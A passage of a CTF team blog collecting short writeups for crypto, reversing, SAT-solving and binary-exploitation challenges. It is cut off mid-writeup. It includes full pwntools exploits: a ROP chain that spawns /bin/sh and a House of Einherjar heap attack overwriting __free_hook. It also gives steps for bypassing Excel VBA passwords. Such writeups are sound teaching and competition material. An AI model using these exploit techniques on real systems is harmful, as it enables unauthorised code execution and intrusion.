dec = {str(y): x for x, y in enc.items()}

def alphametic(x):
    return ''.join([str(dec[y]) for y in x])

The second part of the cipher was a bit hard to decipher because of language barriers.

What it did was basically:

convert each letter of the plain text to its position in the alphabet starting from 0
substitute each number following this rule plain_text[i] = (plain_text[i] - (i+1) * len(plain_text)) % 26
convert the numbers back

To decrypt we just add instead of subtract

import string
i = lambda x: string.uppercase.index(x)

def custom(x):
    size = len(x)
    for j, c in enumerate(x):
        yield string.uppercase[(i(c) + (j + 1) * size) % 26]

efl = ''
for ef in eflag:
    efl += (alphametic(ef))

print(''.join(custom(efl)))

THEARSOFDIDUCTION

Xiomara 2018 - Slammer

info@theromanxpl0.it (TRX) — Mon, 26 Feb 2018 00:00:00 +0000

We are given a binary that takes a password as input, sleeps for a couple of seconds and the tells us wether the password is right or wrong.

Since I didn’t feel like reversing this jumpy mess, I decided to solve this challenge using the number of memory accesses as an oracle.

I can’t remember/find where I saw this technique first, if you have any resources you can leave them in the comments.

I figured out that this binary was just some kind of “fancy” strcmp, so it probably terminated the execution as soon as it found a non matching character.

First of all overwrite the nanosleep syscall with nops to speed up the bruteforce.

Then use the pinatrace pintool to count memory reads and writes.

Try each letter, digit and probable symbols keeping the one that leads to most memory operations.

Run this script from source/tools/SimpleExamples/obj-intel64

import string
import subprocess as sp
flag = ''
alphabet = string.ascii_letters + string.digits + '{} _='

for i in range(100):
	cur = 0
	ans = ''
	for j in alphabet:
		# print(j)
		cnt = int(sp.check_output(['sh', '-c', "echo '{}' | '/home/ubuntu/Desktop/pin-3.5-97503-gac534ca30-gcc-linux/pin' -t pinatrace.so -o /proc/self/fd/1 -- ~/Desktop/slammer | wc -l".format(flag + j)]))
		# print(j, cnt)
		if cnt > cur:
			cur = cnt
			ans = j
	flag += ans
	print(flag)

This is the count for the first byte

('a', 6)
('b', 6)
('c', 6)
('d', 6)
('e', 6)
('f', 6)
('g', 6)
('h', 6)
('i', 6)
('j', 6)
('k', 6)
('l', 6)
('m', 6)
('n', 6)
('o', 6)
('p', 6)
('q', 6)
('r', 6)
('s', 6)
('t', 6)
('u', 6)
('v', 6)
('w', 6)
('x', 6516)
('y', 6)
('z', 6)
('A', 6)
('B', 6)
('C', 6)
('D', 6)
('E', 6)
('F', 6)
('G', 6)
('H', 6)
('I', 6)
('J', 6)
('K', 6)
('L', 6)
('M', 6)
('N', 6)
('O', 6)
('P', 6)
('Q', 6)
('R', 6)
('S', 6)
('T', 6)
('U', 6)
('V', 6)
('W', 6)
('X', 6)
('Y', 6)
('Z', 6)
('0', 6)
('1', 6)
('2', 6)
('3', 6)
('4', 6)
('5', 6)
('6', 6)
('7', 6)
('8', 6)
('9', 6)
('{', 6)
('}', 6)
(' ', 6)
('_', 6)
('=', 6)

EvlzCTF - Primeates

info@theromanxpl0.it (TRX) — Tue, 13 Feb 2018 00:00:00 +0000

After playing with nc for a little while, we discovered that the decryption algorithm simply extracts the cube root of the number (the encrypted data). Due to the big number we are dealing with, you have two different ways to solve this challenge: either use Sage, or just use WolframAlpha to compute all the roots. And yes, my laziness made me use the second way :)

Harekaze CTF 2018 - Div N

info@theromanxpl0.it (TRX) — Sun, 11 Feb 2018 00:00:00 +0000

We are given a c function that does the integer division of the argument by a constant N.

long long div(long long x) {
    return x / N;
}

The constant is set at compile time

$ gcc -DN=$N -c -O2 foo.c

Given the disassembly of the function we need to recover N

$ objdump -d foo.o

foo.o:     file format elf64-x86-64

Disassembly of section .text:
0000000000000000
:
   0:	48 89 f8             	mov    %rdi,%rax
   3:	48 ba 01 0d 1a 82 9a 	movabs $0x49ea309a821a0d01,%rdx
   a:	30 ea 49
   d:	48 c1 ff 3f          	sar    $0x3f,%rdi
  11:	48 f7 ea             	imul   %rdx
  14:	48 c1 fa 30          	sar    $0x30,%rdx
  18:	48 89 d0             	mov    %rdx,%rax
  1b:	48 29 f8             	sub    %rdi,%rax
  1e:	c3                   	retq
$ echo “HarekazeCTF{$N}” > /dev/null

I tried at first to run the code in an emulator, but the movabs with a quad word immediate wasn’t supported, so I rewrote the code in python. In the System V x86_64 calling convenction rdi holds the first argument of a function. The disassembly is in the AT&T syntax, not the usual Intel syntax (e.g. mov %rdi, %rax means rax = rdi, that is move rdi to rax)

def div(rdi):
    rax = rdi
    rdx = 0x49ea309a821a0d01
    rdi = rdi >> 0x3f
    rdxrax = rdx * rax
    rdx, rax = rdxrax >> 64, rdxrax % (2 ** 64)
    rdx = rdx >> 0x30
    rax = rdx
    rax = rax - rdi
    return rax

Since this function computes x / N, we have that the smallest x such that x / N = 1 is x = N. Since x / N is a monotone function we can use binary search to efficiently find this x.

print(div(2 ** 64 - 1))
h = 2 ** 64 - 1
l = 0
while h - l > 1:
    m = (h + l) / 2
    if div(m) >= 1:
        h = m
    else:
        l = m
# we have that div(l) < 1 and l is non decreasing after each iteration
# so at the end of the binary search l is the greatest x such that div(x) = 0
# that in turn means that l + 1 is the smallest x such that div(x) = 1
print(l + 1)
print(div(l))

print(div(l + 1))

SharifCTF 8 - Fifteen puzzle

info@theromanxpl0.it (TRX) — Sun, 04 Feb 2018 00:00:00 +0000

You are given 128 puzzles (https://en.wikipedia.org/wiki/15_puzzle)
The ith puzzle determines the ith bit of the flag:
1 if the puzzle is soluble
0 if the puzzle is unsoluble
Implement is_soluble() below, and use the code to get the flag!

This was an easy task, as all that was required was determining if a given 15-puzzle was solvable. After some thirty seconds of googling, I had the algorithm, as described here. All we have to do is calculate the inversion count of the numbers and we’re basically done. Here is the code I used, with the naive O(N^2) algorithm for the inversion count:

data = """
[...]
""".split('\n')

def invcount(data):
    res = 0
    for i in range(len(data)):
        for j in range(i):
            if data[j] > data[i]:
                res += 1
    return res

out = ''

for i in range(128):
    mat = []
    row = -1 # empty cell's row
    for j in range(4):
        while not data[0].strip().startswith('|'):
            data = data[1:]
        line = data[0].split('|')[1:-1]
        if '  ' in line:
            row = j
        mat += [int(x, 10) for x in line if len(x.strip()) > 0]
        data = data[1:]

    if (row + invcount(mat)) % 2 == 0:
        out = '1' + out
    else:
        out = '0' + out

print('SharifCTF{%016x}' % int(out, 2))

SharifCTF{52d3b36b2167d2076b06d8101582b7af}

SharifCTF 8 - OldSchool-NewAge

info@theromanxpl0.it (TRX) — Sun, 04 Feb 2018 00:00:00 +0000

#TheRomanXpl0it - malweisse

from pwn import *
import sys

#########################################################
BINARY="./vuln4"
HOST="ctf.sharif.edu"
PORT=4801
ENV={"LD_PRELOAD":"./libc.so.6"}
GDB=""
#########################################################

if len(sys.argv) < 2:
 print "args: bin|net|ida|gdb\n"
 sys.exit(1)

if sys.argv[1] == "bin":
 p = process(BINARY, env=ENV)
elif sys.argv[1] == "net":
 p = remote(HOST, PORT)
elif sys.argv[1] == "ida":
 p = process("./linux_server64", env=ENV)
 p.recvuntil("0.1...")
elif sys.argv[1] == "gdb":
 p = process(BINARY, env=ENV)
 gdb.attach(p, GDB)
else:
 print "args: bin|net|ida|gdb\n"
 sys.exit(1)

libc_elf = ELF("libc.so.6")

print p.recvuntil("yourself\n")

#### PHASE 1 - LEAK THE PUTS ADDRESS FROM THE GOT AND RESTART ####

puts_got = 0x08049874
puts_plt = 0x080483A0

new_ebp = 0x08049990 #RW memory because the buffer is read in [ebp-3Ah]

rop = ""
rop += p32(0x08048513) #main+41
rop += p32(puts_got)

#jump to 'call _puts' to print the puts address and read another buffer
p.sendline(18*"a" + p32(new_ebp) + rop)

r = p.recvline()[:4]
puts = u32(r)

libc_address = puts - libc_elf.symbols["_IO_puts"]# libc.so.6
print " >> libc addr: " + hex(libc_address)

#### PHASE 2 - BUILD A ROPCHAIN WITH LIBC GADGETS AND WIN ####

rebase_0 = lambda x : p32(x + libc_address)

rop = '' #generated with ropper
rop += rebase_0(0x0002406e) # 0x0002406e: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x000b5377) # 0x000b5377: pop ecx; ret;
rop += rebase_0(0x001b3040)
rop += rebase_0(0x0018e372) # 0x0018e372: mov dword ptr [ecx], eax; ret;
rop += rebase_0(0x0002406e) # 0x0002406e: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x000b5377) # 0x000b5377: pop ecx; ret;
rop += rebase_0(0x001b3044)
rop += rebase_0(0x0018e372) # 0x0018e372: mov dword ptr [ecx], eax; ret;
rop += rebase_0(0x0002c79c) # 0x0002c79c: xor eax, eax; ret;
rop += rebase_0(0x000b5377) # 0x000b5377: pop ecx; ret;
rop += rebase_0(0x001b3048)
rop += rebase_0(0x0018e372) # 0x0018e372: mov dword ptr [ecx], eax; ret;
rop += rebase_0(0x00018395) # 0x00018395: pop ebx; ret;
rop += rebase_0(0x001b3040)
rop += rebase_0(0x000b5377) # 0x000b5377: pop ecx; ret;
rop += rebase_0(0x001b3048)
rop += rebase_0(0x00001aa6) # 0x00001aa6: pop edx; ret;
rop += rebase_0(0x001b3048)
rop += rebase_0(0x0002c79c) # 0x0002c79c: xor eax, eax; ret;
rop += rebase_0(0x0013fd80) # 0x0013fd80: add eax, 9 ; ret
rop += rebase_0(0x000a0567) # 0x000a0580: add eax, 2 ; ret
rop += rebase_0(0x00002c87) # 0x00002c87: int 0x80;

if rop.find("\0") != -1: #highly unlikely
 print " >> byte 0 in the payload.\n >> retry to run the exploit."
 sys.exit(1)

p.sendline(22*"a" + rop)

p.interactive()

SharifCTF 8 - t00p_secrets

info@theromanxpl0.it (TRX) — Sun, 04 Feb 2018 00:00:00 +0000

Decompiling the binary we can discover the master key. Running the program the output is this:

$ ./t00p_secrets
Welcome to SUCTF secret management service
Enter your master key: wjigaep;r[jg]ahrg[es9hrg
1. Create a secret
2. Delete a secret
3. Edit a secret
4. Print secret
5. Print a secret
6. Exit
>

There are six options: create, delete, edit… ok it’s a heap pwn.

Exploring the create and edit options we can see that the content of a secret can be a string or a binary data.

The function that reads the content of a secret is the following:

__int64 __fastcall read_content(void *dest, signed __int64 size, __int16 is_string)
{
  __int16 v4; // [rsp+Ch] [rbp-24h]
  unsigned int v5; // [rsp+24h] [rbp-Ch]

  v4 = is_string;
  if ( size > 0 )
  {
    v5 = read(0, dest, size);
    if ( v4 )
      *((_BYTE *)dest + v5) = 0; //overflow if v5==size
  }
  return 0LL;
}

Note: dest is a buffer allocated with malloc(size).

The bug is here. If the user choice is that a secret content is a string there is an off-by-one overflow due to the string terminator.

House of Einherjar can be used to force malloc to return a pointer near an area where you can write.

The idea is to force malloc to return a pointer near the global variable ptr + 0xA in .data (where the program stores the pointers to the secrets contents) so we can write the address of __free_hook (not a GOT entry beacause there is Full RELRO) in that area and then use edit to write in __free_hook.

Firstly I used the overflow to crash the program and retrieve some offsets of libc symbols from the crash dump.

create(0, 24)
create(1, 24)
edit(0, "a"*24) #overflow, write 0 to the last byte of the size field in the chunck 1
delete(1) #free search for a free chunck in [address of 1] + 0xaaaaaaaa, so it crashes with 'free(): invalid pointer'

Using libc database I found that the service is using libc6_2.23-0ubuntu10_amd64.so.

Let’s write the exploit.

In the main procedure we can see that there is an hidden option, the seventh, that can be used to change the master key (24 bytes).

The master key is in data, above our target ptr + 0xA.

Perfect.

I used master key to forge a fake chunck. But there is a problem: a malloc chunck is 48 bytes.

So i decided to put in master_k only a part of the chunck, size + fd + bk.

struct malloc_chunk {
    INTERNAL_SIZE_T         prev_size;
    INTERNAL_SIZE_T         size; //set to 0
    struct malloc_chunk*    fd; //set to fake chunck address (master_k -8)
    struct malloc_chunk*    bk; //set to fake chunck address (master_k -8)
    struct malloc_chunk*    fd_nextsize;
    struct malloc_chunk*    bk_nextsize;
};

To prevent a corrupted prev_size vs. size crash also the other fields must be setted to 0.

But master_k, after the program start, is -1. fd_nextsize and bk_nextsize are 0, but if I used the secrets 0 and 1 they will be dirty.

Before master_k the program writes the size of each secret. So to have a valid fake chunck we must do two things:

never allocate the 0 and 1 secrets (whe have other 6 slots to use)
create the secret 7 with size 0, so prev_size is 0

Ok now to force free to consider the fake chunck a valid free chunck we must have the offset between the overflowed chunck and the fake chunck.

An heap leak is needed.

Fortunately when a secret is deleted the heap is not cleared, so we can leak the fd pointer allocating a previous free chunk.

create(2, 24)
create(3, 248)
create(4, 24)
delete(2)
delete(4)
create(4, 24, val="")

heap_leak = "\x20" + print_one(4)[1:8] #fd pointer of the secret 4 points to the secret 2 (0x20 is needed because the last byte is overwritted by newline)

The chunck that will be manipulated is the second (secret 3), at address heap_leak + 24.

Using edit we set the prev_size of this chunck to the offset between it and the fake chunck.

Calling delete on it will force malloc to use the fake chunck as the next chunck to be allocated (if the size match).

We must change again master_k to set the fake chunck size to 0x100.

Now malloc(248) returns the fake chunck address + 16.

OKKKK whe can write on the memory after master_k now! Specifically in ptr + 0xA.

But before we need a lib leak.

Just print the new chunck to get an address from the main arena (free has rewritten fd with it).

The last phase is to overwrite the pointer to already created secret content with __free_hook, use edit and write the magic gadget address in __free_hook, call free and win.

Download the binary here. Full exploit code:

#TheRomanXpl0it - malweisse

from pwn import *
import sys

#########################################################
BINARY="./t00p_secrets"
HOST="ctf.sharif.edu"
PORT=22107
ENV={"LD_PRELOAD":"./libc6_2.23-0ubuntu10_amd64.so"}
GDB=""
#########################################################

if len(sys.argv) < 2:
    print "args: bin|net|crash|ida|gdb\n"
    sys.exit(1)

if sys.argv[1] == "bin":
    p = process(BINARY, env=ENV)
elif sys.argv[1] == "net" or sys.argv[1] == "crash":
    p = remote(HOST, PORT)
elif sys.argv[1] == "ida":
    p = process("./linux_server64", env=ENV)
    p.recvuntil("0.1...")
elif sys.argv[1] == "gdb":
    p = process(BINARY, env=ENV)
    gdb.attach(p, GDB)
else:
    print "args: bin|net|crash|ida|gdb\n"
    sys.exit(1)


def create(idx, size, val="0"):
    print p.recvuntil("> ")
    p.sendline("1")
    print p.recvuntil(": ")
    p.sendline(str(idx))
    print p.recvuntil(": ")
    p.sendline(str(size))
    print p.recvuntil(": ")
    p.sendline("0") #binary
    print p.recvuntil(": ")
    p.sendline(val)
    print " >> %d created" % idx

def delete(idx):
    print p.recvuntil("> ")
    p.sendline("2")
    print p.recvuntil(": ")
    p.sendline(str(idx))

def edit(idx, val, b="1"):
    print p.recvuntil("> ")
    p.sendline("3")
    print p.recvuntil(": ")
    p.sendline(str(idx))
    print p.recvuntil(": ")
    p.sendline(b) #string
    print p.recvuntil(": ")
    p.sendline(val)

def print_one(idx):
    print p.recvuntil("> ")
    p.sendline("5")
    print p.recvuntil(": ")
    p.sendline(str(idx))
    print p.recvline(False)
    print p.recvuntil(": ")
    r = p.recvuntil("-----***-----")
    print r
    return r

def change_key(k):
    print p.recvuntil("> ")
    p.sendline("7")
    print p.recvuntil(": ")
    p.sendline(k)
    print p.recvuntil(": ")
    p.sendline(k)


print p.recvuntil("key: ")
p.sendline("wjigaep;r[jg]ahrg[es9hrg")

if sys.argv[1] == "crash": #use offsets in dump to discover the libc version
    create(0,24)
    create(1,24)
    edit(0, "a"*24)
    delete(1)

    print p.recvall()
    p.close()
    sys.exit(0)

### PHASE 1 - CRAFT FAKE CHUNCK ###

master_k = 0x06020A0

fake_chunk_addr = master_k -8
fake_chunk_from_size = p64(0) + p64(fake_chunk_addr) + p64(fake_chunk_addr)

change_key(fake_chunk_from_size)

print " >> fake chunck addr: " + hex(fake_chunk_addr)

### PHASE 2 - HEAP LEAK ###

create(2,24)
create(3,248, val="BBB")
create(4,24)
delete(2)
delete(4)
create(4,24, val="")

heap_leak = "\x20" + print_one(4)[1:8]
first_addr = u64(heap_leak)
print " >> first addr: " + hex(first_addr)

second_addr = first_addr + 32

### PHASE 3 - PREPARE FAKE CHUNCK ###

create(2,24, val="AAAA")

create(7,0, val="") #clear fake_chunk[0]

### PHASE 4 - OFF BY ONE OVERFLOW ###

off = fake_chunk_addr - (second_addr -16)
print " >>> new prev_size: " + hex(-off)
edit(2,"a"*16+p64(-off))

delete(3) #trigger

### PHASE 5 - MALLOC RETURN FAKE_CHUNK + 16 ###

fake_chunk_from_size = p64(0x100) + p64(fake_chunk_addr) + p64(fake_chunk_addr)
change_key(fake_chunk_from_size)

create(3, 248 , val="")

forged = fake_chunk_addr + 16 #now 3 is master_k+8

### PHASE 5 - LIBC LEAK FROM ARENA ###

libc_leak = print_one(3)[:8]
libc_addr = u64(libc_leak) - 0x3c4b0a
print " >> libc addr: " + hex(libc_addr)

ptr_2 = 0x00602068 + (2+0xa)*8
print " >> ptr secret 2: " + hex(ptr_2)

libc = ELF("libc6_2.23-0ubuntu10_amd64.so")

### PHASE 6 - REWRITE POINTER WITH FREE_HOOK ###

edit(3, "\0"*(ptr_2 - forged) + p64(libc_addr + libc.symbols["__free_hook"]), b="0")

### PHASE 7- WRITE THE ONE CALL GADGET ADDRESS IN FREE_HOOK ###

magic = libc_addr + 0x0000000004526a
edit(2, p64(magic), b="0")

### PHASE 8 - PWN ###

delete(7) #WIN

p.interactive()

AceBear Security Contest - imageauth

info@theromanxpl0.it (TRX) — Sun, 28 Jan 2018 00:00:00 +0000

Challenge description

Authentication with password is sooooooo yesterday.

Challenge files: Link

Authenticate at: http://gudluck.h4ve.fun:8001/

Solution

We can upload images to the server that with classify them with a neural network.

We have to submit an image that has a gud_prob > 0.99.

We are given the source code.

There is a lot of literature (research papers) about the subject of visualizing or even reversing a neural network, but I didn’t find something easy to use.

Armed with ingenuity I decided to do it by hand.

Deploy the service locally and add a couple of debugging logs

weights of various layers
output values
normalized image

At first I tried with some simple images like pure white and pure black, and get a gud_prob of around 0.5-0.6.

I noticed that in the normalized white image there were some different values for the different colour channels of the image.

I took note of the ratios and made an image filled with a colour that respected those ratios (dark grey) and got a gud_prob of 10 ^ -40 and every value in the normalized image was negative.

So I conjectured that the image had to be overall somewhat bright (mostly positive values).

I inverted the colour and got a score of 0.7.

I then tried to play with the scoring system one paint stroke at a time.

After each edit we submit and observe the change in the score, decide if we want to revert and the next edit.

The final result

It doesn’t work every time, but one time is enough.

Insomnihack Teaser 2018 - Rule86

info@theromanxpl0.it (TRX) — Wed, 24 Jan 2018 00:00:00 +0000

Why

There are already couple writeups available, so I just want to show a different approach to this challenge. I will not discuss the first part of this challenge since it has been explained before.

The writeup is kind of long, but it doesn’t take much time or effort to use these ideas during a competition.

After we have obtained the decrypted python script and gif, we have to obtain the seed of the PRNG.

The algorithm is quite simple.

RULE = [86 >> i & 1 for i in range(8)]
N_BYTES = 32
N = 8 * N_BYTES

def next(x):
  x = (x & 1) << N+1 | x << 1 | x >> N-1
  y = 0
  for i in range(N):
    y |= RULE[(x >> i) & 7] << i
  return y

# Bootstrap the PNRG
keystream = int.from_bytes(args.key.encode(),'little')
for i in range(N//2):
  print(i)
  keystream = next(keystream)

At the time of writing, every writeup focuses on reversing the next function. However there is a trick that can be used to find preimages for similar simple algorithms which does not require to a lot of understanding of the algorithm to reverse.

The idea is that we can use a SAT or SMT solver to find the preimage of a function. We will use Z3.

So we rewrite each function to take an expression and output an expression.

Rewriting the functions

For function next we take an array of booleans (z3.Bool) which represent the bits of the seed with the least significant bit in x[0] and the most significant bit in x[-1]

def next(x):
		# we translate the bit operations
    x = [x[-1]] + x + [x[0]]
		# we convert RULE to a function that takes 3 bits
    return [RULE(x[i + 2], x[i + 1], x[i]) for i in range(256)]

For RULE we take the truth table associated with the array and write its associated boolean function in disjunctive normal form.

def RULE(x, y, z):
    return Or(
        And(Not(x), Not(y), z), # 001 = 1 -> 1
        And(Not(x), y, Not(z)), # 010 = 2 -> 1
        And(x, Not(y), Not(z)), # 100 = 4 -> 1
        And(x, y, Not(z))       # 110 = 6 -> 1
    )

Now we just need to obtain the constraits. We create a Solver, an array of 256 Bools to model our 64 32 byte integer and we save the expression for the output of next.

s = Solver()
seed = [Bool('seed[{}]'.format(i)) for i in range(256)]
next_value = next(seed)

We set as a target the first known output value of the PRNG. Since we want to know the preimage of this value, we add constraints for bit to bit equality to next_value. If the constraints are satisfiable we get a model (some concrete values for each of the variables we defined) for these constraints and then convert the bits to an integer

target = 37450399269036614778703305999225837723915454186067915626747458322635448226786
for j in range(256):
        bit = ((1 << j) & target) >= 1
        s.add(next_value[j] == bit)
if s.check() == sat:
        m = s.model()
        ans = 0
        for j in range(256):
            ans |= (1 if m[seed[j]] else 0) << j

We just repeat this process 128 times to get the original seed and print the flag

Putting it all together

Final notes

we actually can reverse multiple applications of the next function just by calling multiple time next
we actually may want to do this since next is actually not injective (another plus of SAT and SMT solvers is that we can and proved this next(0x73245e28a24b91090a0967c212e2496612c42512e29c0a224945c428b0b39271) == next(0x892814514904a727172102ce41492116429c8a41442f14c922829c50b08490a))
however notice that if you compute too many iterations at the same time, you kill performance
if we had used more of the SMT features that z3 offers, we could have almost copy pasted the original code

from z3 import *
from binascii import unhexlify
s = Solver()
seed = [Bool('seed[{}]'.format(i)) for i in range(256)]

def RULE(x, y, z):
    return Or(
        And(Not(x), Not(y), z), # 001 = 1 -> 1
        And(Not(x), y, Not(z)), # 010 = 2 -> 1
        And(x, Not(y), Not(z)), # 100 = 4 -> 1
        And(x, y, Not(z))       # 110 = 6 -> 1
    )

def next(x):
    x = [x[-1]] + x + [x[0]]
    return [RULE(x[i + 2], x[i + 1], x[i]) for i in range(256)]

target = 37450399269036614778703305999225837723915454186067915626747458322635448226786
next_value = seed

steps = 8

for i in range(steps):
    next_value = next(next_value)

for i in range(128 // steps):
    # take a snapshots of the solver constraints
    s.push()
    for j in range(256):
        bit = ((1 << j) & target) >= 1
        s.add(next_value[j] == bit)
    if s.check() == sat:
        m = s.model()
        ans = 0
        for j in range(256):
            ans |= (1 if m[seed[j]] else 0) << j
        # renew the target
        target = ans

        if 'INS' in unhexlify('%064x' % ans)[::-1]:
            print(repr(unhexlify('%064x' % ans)[::-1]))
    # restore the snapshot
    s.pop()

next is not injective (e.g. not invertible)

s = Solver()
seed = [Bool('seed[{}]'.format(i)) for i in range(256)]
seed1 = [Bool('seed1[{}]'.format(i)) for i in range(256)]

nv = next(seed)
nv1 = next(seed1)
# we want same output
for j in range(256):
    s.add(nv[j] == nv1[j])

# we want different input
dis = False
for i in range(256):
    dis = Or(dis, seed[i] != seed1[i])

s.add(dis)
print(s.check())

m = s.model()
ans = 0
for j in range(256):
    ans |= (1 if m[seed[j]] else 0) << j
print(ans)
ans = 0
for j in range(256):
    ans |= (1 if m[seed1[j]] else 0) << j
print(ans)
s.pop()

3DS CTF 2017 - W32.killah

info@theromanxpl0.it (TRX) — Tue, 02 Jan 2018 00:00:00 +0000

We are given a malware sample. We take a snapshot on our VM and run it. It asks for administrative privileges that we proptly grant. After the execution our machine shuts down and cannot reboot.

Let’s open it with x64dbg and step through the code. We notice that:

the string @0x403223 is modified many times.
@0x4010e0 and @0x401100 the program tries to exit so we just nop out a couple instructions
@0x0040115f it creates a file with name ‘flag_is_here’ then writes 13 bytes from 0x403223 and 16 from 0x403231 There are two decryption routines

│              ; CALL XREF from 0x00401011 (entry0)
│              ; CALL XREF from 0x00401048 (entry0)
│              ; CALL XREF from 0x0040112d (entry0)
│              ; CALL XREF from 0x00401143 (entry0)
│           0x004011a9      51             push ecx
│           0x004011aa      52             push edx
│              ; JMP XREF from 0x004011b0 (entry0)
│       ┌─> 0x004011ab      0002           add byte [edx], al
│       ⁝   0x004011ad      3002           xor byte [edx], al
│       ⁝   0x004011af      42             inc edx
│       └─< 0x004011b0      e2f9           loop 0x4011ab               ;[1]
│           0x004011b2      5a             pop edx
│           0x004011b3      59             pop ecx
└           0x004011b4      c3             ret

And

┌ (fcn) fcn.004011b5 10
│   fcn.004011b5 ();
│              ; UNKNOWN XREF from 0x0040107e (entry0)
│              ; CALL XREF from 0x0040107e (entry0)
│           0x004011b5      51             push ecx
│           0x004011b6      52             push edx
│              ; JMP XREF from 0x004011ba (fcn.004011b5)
│       ┌─> 0x004011b7      3002           xor byte [edx], al
│       ⁝   0x004011b9      42             inc edx
│       └─< 0x004011ba      e2fb           loop 0x4011b7               ;[3]
│           0x004011bc      5a             pop edx
│           0x004011bd      59             pop ecx
└           0x004011be      c3             ret

So we try jumping around at each function call prelude. The first half of the flag is easy to get (you can actually read it in the file), for the latter half I missed a call at first so I just got rubbish and it cost me a couple of resets.

3DS CTF 2017 - String Obfuscator

info@theromanxpl0.it (TRX) — Thu, 21 Dec 2017 00:00:00 +0000

The input file had no extension, so the first thing to do was figure out how to read it. I opened it in n++ and saw it began with the zip header, so it got decompressed. On the inside, the files were actually the structure of an .xlsm file, so rather than working on the directory I changed the extension of the input and opened it in excel. I had to enable macros for the challenge to work properly, and this is what I saw at first:

By clicking on the icon in the top left, a dialog would pop up and ask for a string to be encrypted:

It was at this point that I figured out that the string in the bottom was the output of that encryption algorithm and that I had to find and reverse it. As I enabled macros before, I went to the visual basic editor (that’s Alt+F11), but was prompted for a password. After trying the obvious passwords with no success, I was stuck for a while. Paraphrasing my teammate, for a l33t h4xor it’s easy, for me it means Google

As it turns out, excel passwords are implemented horribly, so by just following a couple steps from here I was able to bypass it. I’ll list them here for clarity:

Change the string ‘DPB’ to ‘DPx’ inside the file
Close and reopen the file (duh!)
Open the vbasic window, tell it it’s fine that the password is broken, set a new password

Yup, done already. VBA passwords are that easy to bypass.

One note, though: When I tried to modify the string in file xl/vbaProject.bin inside the unzipped folder and compress it back, Excel wouldn’t accept it. The only thing to work for me was to add the modified file to the original zip, so that compression options would be kept.

So I could finally get my hands on the obfuscation algorithm. There were a couple hundred lines of visual basic, of which only a few were actually important, while the others were conversion algorithms between base64/text/bytes.

Private Sub OK_Click()
    If TextBox1.Value = "" Then: Exit Sub
    Dim x, l, a, test1, test As String
    Dim tam As Integer
    x = TextBox1.Value
    tam = Len(x)
    While tam > 0: a = a & (Asc(Mid(x, 1, 1))): tam = tam - 1: x = Right(x, tam): Wend
    ' a is now the concatenation of the ascii values in the string. Ex: "abcd" -> 979899100
    tam = Len(a)
    While a <> "":
        test1 = Mid(a, 1, 1):
        ' test1 contains the current digit in a
        test = test & (Mid(a, 1, 1) + tam):
        ' test contains each digit in a + len(a). Ex: a = 123, test = 456
        l = l & Chr(Mid(a, 1, 1) + tam):
        ' l is the same as test but with each digit interpreted as ascii
        a = Right(a, Len(a) - 1):
    Wend
    MsgBox Base64EncodeString(l), vbOKOnly, "Obfuscation Successfully": Unload Me
End Sub

It’s ugly, I know. But I still went and wrote an inverse algorithm in python, which was used to get the flag:

def decrypt(target):
	d = base64.b64decode(target)
	e = ''.join(str((ord(ch) - len(d)) % 256) for ch in d)

	i = 0
	out = ''
	while i < len(e):
		if i < len(e) - 2 and e[i] == '1':
			out += chr(int(e[i:i+3]))
			i += 3
		elif i < len(e) - 1:
			out += chr(int(e[i:i+2]))
			i += 2
		else:
			i += 1
	return out

At this point I thought I had it, but it took me a while to actually get to the flag. I couldn’t get copy paste to work from excel for some reason, so at first I was manually copying the string over and I couldn’t see there were some missing characters that overflowed the textbox. Excel has another layer of protection that can be applied on the whole document, which I had to remove by going to Revision->Remove sheet protection. Only now could I get copy paste to work and obtain the full encrypted string:

XVleYGBbWVpbXl9cYF9gX1lgWl1aXV1gXV9eXVpdXVxhXGBfYF1bYV1gYVxgYF1hXV9dX2BcYGBfYV1dXV9aXVlhXWBfXGBgWl9dXVtfWl1ZXVldXVlaXQ==

By running it through the decryption routine, I got the flag: 3DS{C0NGR47UL4710N5_Y0U_KN0W_7H3_W0RK5H337}.

Finally!

3DS CTF 2017 - Microscope

info@theromanxpl0.it (TRX) — Wed, 20 Dec 2017 00:00:00 +0000

The input gif had 108900 frames, all either yellow or green. By mapping each one to a single white or black pixel of an image, we can get to a qr code. The tricky part here was that the frame data was identical for each one of them, while the thing to change was the first entry in the color palette, effectively modifying the color without touching the actual pixel data.

#!/usr/bin/python2

import os
from PIL import Image

def extractFrames(inGif, outFolder):
	outdata = []
	frame = Image.open(inGif)
	nframes = 0
	while frame:
		if frame.getpalette()[0] < 128:
			outdata += [(0,0,0)]
		else:
			outdata += [(255,255,255)]

		nframes += 1
		try:
			frame.seek(nframes)
		except EOFError:
			break
	return outdata


if __name__ == "__main__":
	c = extractFrames('gif.gif', 'output')
	img = Image.new('RGB', (330, 330))
	img.putdata(c)
	img.save('qr.png', 'PNG')

The output of this script is the following image, which when read reveals the flag:

3DS{s0_y0u_kn0w_yur_g1fs}

3DS CTF 2017 - Bit Map

info@theromanxpl0.it (TRX) — Tue, 19 Dec 2017 00:00:00 +0000

from __future__ import print_function
from bs4 import BeautifulSoup

with open('index.html', 'r') as f:
 html = f.read()

soup = BeautifulSoup(html, 'html.parser')

tmp = []

for e in soup.find_all('td'):
 tmp.append(e.get('bgcolor'))

r = ""
for bg in tmp:
 r = r + bg[1:].decode('hex')

if '3DS' in r:
 idx = r.index('3DS')
 while not r[idx] == '}':
 print(r[idx], end='')
 idx = idx + 1
 print('}')

This script prints our flag -> 3DS{H1dd3n_1n_7ru3_C0l0r5}

HXP CTF 2017 - babyish

info@theromanxpl0.it (TRX) — Fri, 24 Nov 2017 00:00:00 +0000

For this challenge we get a small binary that first asks and prints a name and then reads a string. Our first vulnerability lies in the greet function, where the stack allocated buffer isn’t cleared before use.

void __cdecl greet(FILE *in, FILE *out)
{
  int v2; // eax
  char buf[64]; // [esp+0h] [ebp-48h]

  printf("Enter username: ");
  v2 = fileno(in);
  read(v2, buf, 64u);
  fprintf(out, "Hey %s", buf);
}

Thus when the name is printed back, we get access to some stack variables. In particular, we can leak a libc address and a saved esp value. Having all needed addresses, all that’s left to do is overflow the second read by giving it a negative length and rop our way from there.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  char buf[64]; // [esp+0h] [ebp-5Ch]
  int len; // [esp+40h] [ebp-1Ch]
  int *v7; // [esp+50h] [ebp-Ch]

  v7 = &argc;
  setbuf(stdout, 0);
  greet(stdin, stdout);
  sleep(1u);
  printf("Enter length: ");
  len = num();
  if ( len > 63 )
